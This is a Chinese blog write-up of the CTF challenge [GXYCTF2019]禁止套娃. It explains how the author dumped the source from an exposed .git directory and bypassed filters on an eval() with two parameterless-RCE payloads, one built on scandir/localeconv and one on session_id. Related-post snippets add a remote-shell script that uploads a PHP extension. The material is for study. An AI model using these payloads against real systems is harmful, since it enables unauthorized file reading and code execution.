[GXYCTF2019]禁止套娃1(两种方法)

已于 2022-05-02 16:34:49 修改
阅读量4.4k 收藏 13
点赞数 11
分类专栏: buuctf 文章标签: php web安全 开发语言
于 2022-05-02 12:45:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/124538469
版权
[GXYCTF2019]禁止套娃 1

在这里插入图片描述

进入环境,只有一串字符 查看源代码 抓包 什么都没有发现 尝试使用御剑进行目录爆破 也只是爆出了index.php

在这里插入图片描述
然后 尝试直接使用 php伪协议进行一个 flag 读取 但都失败了。在这种情况下,肯定是服务器进行了一个过滤。所以,我怀疑可能是源码泄露 。
尝试使用 GitHack 看看是不是源码泄露

GitHack 下载地址:https://github.com/lijiejie/GitHack

在这里插入图片描述
在这里插入图片描述

扒下了网站的源码
好了,现在就是代码审计了
最吸引眼球的就是 eval的一句话木马,题目又加了好多过滤限制了REC
首先是 php伪协议 data协议 filter协议 都不能使用了
然后该网站使用了正则匹配 其实这就是无参数的rce

  • 如果如果’;'===preg_replace(…),那么就执行exp传递的命令
  • (?R)? : (?R)代表当前表达式,就是这个(/[a-z,_]+((?R)?)/),所以会一直递归,?表示递归当前表达式0次或1次(若是(?R)*则表示递归当前表达式0次或多次,例如它可以匹配a(b(c()d())))

无参数REC 一般有三种绕过姿势:

  • gettallheaders()
  • get_defined_vars()
  • session_id()
    具体可以参考博客

紧接着 又是一次黑名单过滤,很多的关键字都被黑掉了(带有get 函数的,肯定是不能用了)
但还有一个函数 scandir 以扫描当前目录下的文件

这里,我就直接构造payload:

exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));
  • highlight_file() 函数对文件进行语法高亮显示,本函数是show_source() 的别名
  • next() 输出数组中的当前元素和下一个元素的值。
  • array_reverse() 函数以相反的元素顺序返回数组。(主要是能返回值)
  • scandir() 函数返回指定目录中的文件和目录的数组。
  • pos() 输出数组中的当前元素的值。
  • localeconv() 函数返回一个包含本地数字及货币格式信息的数组,该数组的第一个元素就是"."。

原理:
loacleconv 函数会固定返回一个 . 然后pos将我们获得的 .返回到我们构造的 payload 使得 scandir能够返回当前目录下的数组(换句话说,就是读出当前目录下的文件) rray_reverse()以相反的顺序输出(目的是以正序输出查询出来的内容)然后 next 提取第二个元素(将.过滤出去),最后用highlight_file()给显示出来。

在这里插入图片描述

方法二

上面 的正则过滤中 其实并没有过滤掉 session_id()
所以我们可以使用 session_id来获取 flag
session_id() 可以用来获取/设置 当前会话 ID。
在我们使用 session_id()的时候 需要使用session_start()来开启session会话
我们尝试构造payload

?exp=highlight_file( session_id(session_start()));

session_id(session_start())
使用session之前需要通过session_start()告诉PHP使用session,php默认是不主动使用session的。
session_id()可以获取到当前的session id。

在这里插入图片描述

在这里插入图片描述

hcjtn
关注
  • 11
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
无参数函数RCE+[GXYCTF2019]禁止 1
bazzza的博客
12-27 873
目录无参数RCE常用函数数组操作array_fliparray_randarray_reversecurrent文件file_get_contents()readfile()highlight_file()[别名:show_source()]scandir()direname()getcwd()chdir($directory)读取环境变量get_defined_vars()getenvlocaleconv()phpversion()会话session_idsession_start其它[GXYCTF201
俄罗斯套信封问题(两个维度都递增)1
08-03
示例 2:输出:1def maxEnvelopes(self, envelopes: List[List[int]]) -> int:#按照两维都升序进行排序#
[CISCN2019 总决赛 Day2 Web1]Easyweb && [GXYCTF2019]禁止
crispr的博客
03-17 1295
[CISCN2019 总决赛 Day2 Web1]Easyweb 0X01 前言 现在开始记录BUUCTF上的web了,每周认真刷一些题,了解一些知识点和套路,不要让自己这么菜。。 0X02 正文 发现是一个登录界面,先从登录框fuzz一下,看能否万能密码通过,无果。 一般直接是登录框,肯定隐藏这其他目录或者是源码泄露,所以开始扫目录 dirsearch -u "http://1606db13-...
俄罗斯套
04-17
俄罗斯套动作数据
[GXYCTF2019]禁止1(无参RCE)
最新发布
BoJing6的博客
03-29 302
这一题用githack获取源码我就不讲了,我想说的是这个题的方法和我自己的理解!这段代码就是禁止我们用一些php伪协议之类的东西if(';R)?这个就比较有意思了大概的意思就是把'a-z,_'之后的东西转义为NULL,通俗来说就是可以使用函数但是不能使用参数,下面是在shell中的测试结果解法一:函数介绍:scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)
BUUCTF-[GXYCTF2019]禁止
yuqie的博客
04-06 228
对于第二个if,(?R)是引用当前表达式,(?\),可以迭代下去,那么它所匹配的就是print(echo(1))、a(b(c()));所以可以先利用函数array_reverse将数组反转,flag就在第二位了,再利用next指向第二位数组,在用文件显示包涵即可输出flag.php文件,构造payload。开始审计源码,我们最终的目标是执行@eval($_GET['exp']),从这开始瞄一下大佬的wp,因为我的脚本基础差的没眼看。pos(),传入数组,回显第一个数组的值,pos可以用current代替。
[GXYCTF2019]禁止1 writeup
m0_65080524的博客
08-14 181
preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) : 对输入参数exp做了过滤,把data、filter、php,phar等等php伪协议,别看好像很多\和/ 其实原型是data:// 然后利用\ 去转义/ 所以就变成data:\ /\ /preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) 过滤了很多敏感文件的关键字。
[GXYCTF2019]禁止1 不会编程的崽的博客
不会编程的崽的博客
02-05 1143
ctf 源码泄露 无参数rce
[GXYCTF2019]禁止 1
m0_73728268的博客
07-11 202
1.更加熟悉了对dirsearch和GitHack的使用 2.无参数rce的思想
产品方法论:俄罗斯套原理.docx
12-06
产品方法论:俄罗斯套原理.docx
俄罗斯套信封问题(一维升序 二维降序)1
08-03
示例 2:输出:1def maxEnvelopes(self, envelopes: List[List[int]]) -> int:#按照保证一维升序基础上
别致的俄罗斯套广场.ppt
03-13
别致的俄罗斯套广场.ppt
[GXYCTF2019]禁止
m0_62709637的博客
05-12 336
考点: 1、git源文件泄露 2、rce无参构造 实操: 点开题目,上来就是找flag; f12一点提示都没有,所以果断选择扫一把,发现了.git文件,使用githack获取源文件 GitHack使用语句:GitHack.py http://www.target.com/.git/ 查看index.php 阅读后发现,将伪协议进行了过滤(个人感觉没必要过滤,不理解),并且是无参数构造,最后还禁用了一些关键字; 通过scandir('.')查看根目录下的文件 payload:p
无参数rce
qq_45570082的博客
06-07 2022
总结一下无参数rce的各种解法(为了便于自己查找,同时为了把自己收藏夹的几个相关网址删掉,每次都在别人博客找很麻烦的(手动狗头)) 首先准备代码 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['a'])) { eval($_GET['a']);} 利用session_id php中有一个函数叫session_id(),可以直接获取到cookie中的phpsessionid值,phpsessionid的组成符号有
buuctf-[GXYCTF2019]禁止
qq_42728977的博客
12-24 3393
[GXYCTF2019]禁止考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
命令执行.无参数RCE
E1even的博客
05-25 899
linux是操作系统,是服务器操作系统,目前大多数都是采用linux服务系统 主要原因就不多说了 命令执行和代码执行 命令执行实在LINUX终端里面进行执行的,功能强大 代码执行仅仅是存在与代码中,进行代码执行,个人认为执行的也就仅仅是简单的print内容 核心是命令执行,而非代码执行 既然说到命令执行是在LINUX终端进行的,那么我们需要调用LINUX下的命令执行函数,比如常见的: system shell_exec exec 这些常见的命令执行函数 而我们常见的代码执行函数,最多的就是exec,我们很
ctfshow套shell
08-24
CTFSHOW套shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`php ext_skel.php --ext ctfshow --std`来生成该扩展的目录。 2. 进入生成的目录,并编辑.c文件,根据需要进行修改。 3. 执行以下命令来编译和安装扩展:`phpize ./configure make && make install`。编译完成后,会告知具体的扩展安装位置。 4. 通过发送POST请求,使用CTFSHOW套shell来写入并执行命令。示例代码如下: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'file': '/usr/local/lib/php/extensions/no-debug-non-zts-20180731/mysqli.so', 'content': open('ctfshow.so', 'rb').read()} requests.post(url + '?a=write', data=data) requests.get(url + '?a=run') ``` 5. 使用CTFSHOW套shell执行命令。可以使用以下命令示例: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'cmd': 'cat /f*'} requests.post(url + '?a=shell', data=data) ``` 这样,您就可以使用CTFSHOW套shell来执行命令并获取所需的结果了。请注意,使用套shell存在安全风险,应仅在合法和授权的情况下使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTFSHOW 常用姿势篇(811-820)](https://blog.csdn.net/miuzzx/article/details/124038567)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值